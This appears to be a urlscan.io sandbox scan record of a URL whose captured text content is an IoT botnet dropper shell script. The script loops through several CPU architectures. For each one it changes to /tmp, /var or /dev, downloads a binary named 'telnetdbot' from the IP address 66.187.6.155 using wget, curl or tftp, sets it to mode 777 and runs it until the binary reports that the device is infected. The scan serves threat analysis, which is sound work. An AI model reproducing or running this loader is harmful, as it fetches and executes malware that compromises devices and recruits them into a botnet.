66.187.6.155 Open in urlscan Pro
66.187.6.155  Public Scan

URL: http://66.187.6.155/shk
Submission Tags: falconsandbox
Submission: On June 14 via api from US — Scanned from DE

Form analysis 0 forms found in the DOM

Text Content

binarys="mips mpsl x86 arm arm5 arm6 arm7 sh4 ppc arc"
server_ip="66.187.6.155"
binout="telnetdbot"
exec="your device just got infected to a bootnoot"

for arch in $binarys
do
rm -rf $arch
rm -rf $binout
cd /tmp || cd /var || cd /dev; wget http://$server_ip/$arch -O $binout || curl -O $binout http://$server_ip/$arch || tftp -g -l $binout -r $arch $server_ip
chmod 777 $binout
status=`./$binout $1`
if [ "$status" = "$exec" ]; then
	break
fi
done